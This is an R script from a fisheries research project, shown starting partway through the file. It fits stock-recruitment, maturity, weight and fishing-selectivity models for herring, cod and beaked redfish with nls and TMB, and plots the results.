Recruitment6.1 <- SSB/(alphabh +betabh *SSB) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB/(alphabh +betabh *SSB) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB,col="red", pch=3,ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB,col="blue",pch=1)
points(Recruitment6.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
## plot
rec.vector<-c(Rec, Recruitment5, Recruitment6)
type<-rep(c("Real","Ricker","BH"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### Maturity #####
maturity2 <-melt(codmaturity,id.vars="Year")
maturity2$Age <- rep(3:15,each=dim(codmaturity)[1])
maturity2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity2$Age
data$mprop<-maturity2$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity2$mprop.est <- 1/(1+exp(-((maturity2$Age-a50)/env)))
codmat<-maturity2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Weights #####
weights2 <-melt(codweight,id.vars="Year")
weights2$Age <- rep(3:15,each=dim(codweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
codwei<-weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Selectivity #####
fmort2<-melt(codfmort,id.vars="Year")
fmort2$Age <- rep(3:15,each=dim(codfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
codfsel<- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="b")
#######################################################################
######--------------- BEAKED REDFISH --------------- #############
#######################################################################
recage <- 2
amax <- 40
age <- recage:amax
start.rec <- mean(redfishass2$Rec.age2thousand)*1000
#### Recruitment ####
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
Recruitment6 <- exp(alphar)*data$SSB*exp(betar*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd <-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(redRecruitment5_2018~SSB1,type="l",col="blue") #xlim=c(0, 3000000), ylim=c(0, 10e+08), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
points(y=Rec, x=SSB)
points(y=1/redRec6_2018, x=SSB1, col="blue")
points(y=1/redRec6_2019, x=SSB1, col="red")
points(y=redRecruitment5_2019, x=SSB1, col="red", pch=3)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(redRecruitment5~SSB1,type="l",col="red") # xlim= c(0, 10e+05), ylim=c(0, 2e+09))
points(Recruitment5~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment6 <- betabh + alphabh * (1/SSB1) # testing the alpha and beta, works!
plot(1/redRecruitment6 ~ SSB1,type="l",col="red")
points(x=SSB, y=Rec)
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#---- Plotting all ----#
rec.vector <- c(redRecruitment5, 1/redRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(redRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
maturity <-melt(redfishmaturity,id.vars="Year")
maturity$Age <- rep(6:19,each=dim(redfishmaturity)[1])
maturity %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/maturity.cpp')
dyn.load(dynlib('Scripts_R/maturity'))
data<-list()
data$age<-maturity$Age
data$mprop<-maturity$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((unique(age)-a50)/env))),2) ## used in simulation
maturity$mprop.est <- 1/(1+exp(-((maturity$Age-a50)/env)))
redmat<- maturity %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
maturityforplot <- list()
maturityforplot$Age <- c(6:40)
maturityforplot$mprop.est <- 1/(1+exp(-((c(6:40)-a50)/env)))
maturityforplot <- as.data.frame(maturityforplot)
redmat <- ggplot(data=maturityforplot, inherit.aes=F, aes(x=Age,y=mprop.est)) +
geom_line(color="red",size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_text(size=30),
axis.title.y = element_text(size=30)) + labs(tag="c")
redmat + geom_point(data= maturity,aes(x=Age,y=value), size= 2.5)
##### Weights #####
weights2 <-melt(redfishweight,id.vars="Year")
weights2$Age <- rep(6:19,each=dim(redfishweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/weight.cpp')
dyn.load(dynlib('Scripts_R/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
redwei<- weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 3) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) +
labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
weightforplot <- list()
weightforplot$Age <- c(6:40)
weightforplot$wprop.est <- Winf * (1-exp(-k * (c(6:40))))^b
weightforplot <- as.data.frame(weightforplot)
redwei <- ggplot(data=weightforplot, inherit.aes=F, aes(x=Age,y=wprop.est)) +
geom_line(color="red",size= 0.6) +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redwei + geom_point(data= weights2, aes(x=Age,y=value), size= 2.5)
##### Selectivity #####
fmort2<-melt(redfishfmort,id.vars="Year")
fmort2$Age <- rep(2:19,each=dim(redfishfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
redfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6) +
labs(y= "Fishing selectivity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(),
panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"),
axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20),
axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20)) + labs(tag="c")
fselforplot <- list()
fselforplot$Age <- c(2:40)
fselforplot$fselprop.est <- 1/(1+exp(-(((c(2:40))-s50)/ss)))
fselforplot <- as.data.frame(fselforplot)
redfsel <- ggplot(data=fselforplot, inherit.aes=F, aes(x=Age,y=fselprop.est)) +
geom_line(color="red",size= 0.6) +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redfsel + geom_point(data= fmort3, aes(x=Age,y=sel), size= 2.5)
grid.arrange(nsshmat, codmat, redmat, ncol=3)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(nsshfsel, codfsel, redfsel)
ggsave(filename="fsel_nssh.pdf",
plot=last_plot(),
width = 100,
height = 80,
units = "mm")
###### PLOTTINg all ############
maturitynssh$species <- "NSSH"
maturitycod$species <- "cod"
maturityred$species <- "redfish"
maturitynssh <- as.data.frame(maturitynssh)
maturitycod <- as.data.frame(maturitycod)
maturityred <- as.data.frame(maturityred)
cbind(maturitycod, maturitynssh, maturityred, capematurity)
map2(maturitynssh, maturitycod, maturityred, capmat, left_join)
matall <- merge(maturitynssh, maturitycod, maturityred, by.x = "mprop.est", by.y = "Age", by.z = "species", all.x = T, all.y = T, all.z= T)
params <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point() +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est))+ labs(y= "Fishing selectivity", x= "age") + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"))
params <- params + geom_point(aes(y= ))
grid.arrange(redmat, nsshmat, codmat)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(redfsel, nsshfsel, codfsel)
| /Param_est_copy.R | no_license | jessicaweb3/fmsy_m | R | false | false | 36,237 | r | library(tidyverse)
library(gridExtra)
library(ggplot2)
library(dplyr)
library(gridExtra)
library(reshape2)
library(openxlsx)
library(TMB)
library(here)
library(png)
#####------------ NOTES -------------------#####
# - nll for parameter estimation is log-likelihood
# - SSB is real numbers & SSB1 is theoretical numbers
#------------------------- DATASETS -------------------------------#
nsshass <-read.xlsx(here('Scripts_R/NSSH assessment.xlsx'),sheet=1)
nsshmaturity<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=2)
nsshweight <- read.xlsx(here('Scripts/NSSH assessment.xlsx'), sheet=3)
nsshfmort<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=4)
codass <-read.xlsx(here('Scripts_R/Cod_assessment.xlsx'),sheet=1)
#for biased plotting codass <- codass[-74,]
# colnames(codass)[5] <- "SSB"
# colnames(codass)[6] <- "SSBhigh"
# colnames(codass)[7] <- "SSBlow"
codmaturity<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=2)
codweight <- read.xlsx(here('Scripts/Cod_assessment.xlsx'), sheet=3)
codfmort<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=4)
#for biased plotting
#redfishass <-read.xlsx(here('Scripts/S.mentella_assessment.xlsx'),sheet=1) # Advice2020
# colnames(redfishass)[3] <- "SSB"
#colnames(redfishass)[4] <- "SSBhigh"
#colnames(redfishass)[5] <- "SSBlow"
redfishass <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=2) # Advice2018
redfishass2 <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=3) # AFWG2019
redfishmaturity<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=4)
redfishweight <- read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'), sheet=5)
redfishfmort<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=6)
#######################################################################
######--------------- NSSH --------------- #############
#######################################################################
#### Setting up general parameters
age <- c(2:15)
recage<-2
start.rec <- mean(nsshass$Rec.age2)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB), data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation1<-acf(residuals(nlsrssb))
AR1par<-autocorrelation1$acf[2]
Rvar.std <- mean(exp(rnorm(1e6,0,ricker.sd)))
SSB1 <- seq(0,9e6,1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm. dist error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation)/Rvar.std #- Stochasticy term
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) # autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf)/Rvar.std #- stochasticity term
plot(nsshRecruitment5~SSB1,type="l",col="red") #xlim=c(0, 9), ylim=c(0, 60), xlab="SSB1 million t", ylab="Rec billions") #,ylim=c(0,7e7))
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariation)/Rvar.std #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr. error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf)/Rvar.std #- Stochasticity
plot(Recruitment5~SSB,type="l",col="red")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhnlsrssb <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhnlsrssb)$coefficients[1]
betabh <- summary(bhnlsrssb)$coefficients[2]
bh.sd<-sd(residuals(bhnlsrssb))
bhvar.std <- mean(exp(rnorm(1e6,0, bh.sd)))
bhvariation<- rnorm(length(SSB1),0,bh.sd)
SSB1 <- seq(0, 9e6, 1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment6 <- 1/(betabh + alphabh * 1/SSB1) # testing the alpha and beta, works!
Recruitment6.1 <- 1/(betabh + alphabh * 1/SSB1) * (1/(bhvariation))/bh.sd #- Stochasticy term
plot(nsshRecruitment6 ~ SSB1,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#----- Plotting all ---- #
rec.vector <- c(nsshRecruitment5, nsshRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(nsshRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
maturity2 <-melt(nsshmaturity,id.vars="Year")
maturity2$Age <- rep(0:15,each=dim(nsshmaturity)[1])
maturity3 <- maturity2 %>% filter(Year>1987 & Age>1)
maturity3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity3$Age # changed it from maturity2 to maturity3 to use correct filter
data$mprop<-maturity3$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity3$mprop.est <- 1/(1+exp(-((maturity3$Age-a50)/env)))
nsshmat <- maturity3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age")+ theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="a")
##### Weights #####
weights2 <-melt(nsshweight,id.vars="Year")
weights2$Age <- rep(0:15,each=dim(nsshweight)[1])
weights3 <- weights2 %>% filter(Year>1987 & Age>1)
weights3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights3$Age # changed it from weights2 to weights3 to use correct filter
data$wprop<-weights3$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights3$wprop.est <- Winf * (1-exp(-k * weights3$Age))^b
nsshwei <- weights3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="a")
##### Selectivity #####
fmort2<-melt(nsshfmort,id.vars="Year")
fmort2$Age <- rep(2:12,each=dim(nsshfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value, color=as.factor(Year))) + geom_point()
### ad hoc fix: everything above age 5 is fully selected
fmort2 <- fmort2 %>% mutate(sel=ifelse(Age>5,1,value/max(value[Age<5])),sel=ifelse(sel>1,1,sel))
fmort2 %>%
ggplot(aes(x=Age,y=sel, color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(sel=mean(sel))
### ad hoc fix: everything below age 3 is not fished
fmort3 <- fmort3 %>% mutate(sel=case_when(Age<3 ~ 0,TRUE ~ sel))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
nsshfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="a") + scale_x_continuous(breaks=c(2,6, 10))
#######################################################################
######--------------- NEA COD --------------- #############
#######################################################################
age <- c(3:15) ## maximum age 3-15
recage<- 3
start.rec <- mean(codass$Rec.age3)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(codass$Year)
Rec <- codass$Rec.age3[(recage+1):tsl]*1000
SSB <- codass$SSBtonnes[1:(tsl-(recage))]
